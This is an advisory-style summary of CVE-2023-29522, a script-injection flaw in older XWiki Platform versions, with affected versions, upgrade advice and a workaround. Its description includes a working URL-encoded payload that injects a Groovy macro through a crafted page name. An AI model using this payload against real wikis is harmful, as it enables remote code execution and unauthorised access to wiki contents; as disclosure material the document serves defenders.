CVE-2023-29522

Name of the Vulnerable Software and Affected Versions XWiki Platform versions prior to 14.4.8 XWiki Platform versions prior to 14.10.3 XWiki Platform versions prior to 15.0RC1

Description The issue allows any user with view rights to execute arbitrary script macros, including Groovy and Python macros, which can lead to remote code execution and unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. For instance, an attacker can exploit this by opening a page with a crafted URL, such as Open <xwiki-host>/xwiki/bin/view/%22%2F%7D%7D%7B%7B%2Fhtml%7D%7D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=XWiki.ClassSheet&xpage=view, where <xwiki-host> is the URL of the XWiki installation.

Recommendations To resolve the issue for versions prior to 14.4.8, upgrade to XWiki 14.4.8 or later. To resolve the issue for versions prior to 14.10.3, upgrade to XWiki 14.10.3 or later. To resolve the issue for versions prior to 15.0RC1, upgrade to XWiki 15.0RC1 or later. As a temporary workaround, consider restricting access to the groovy and python macros until a patch is applied.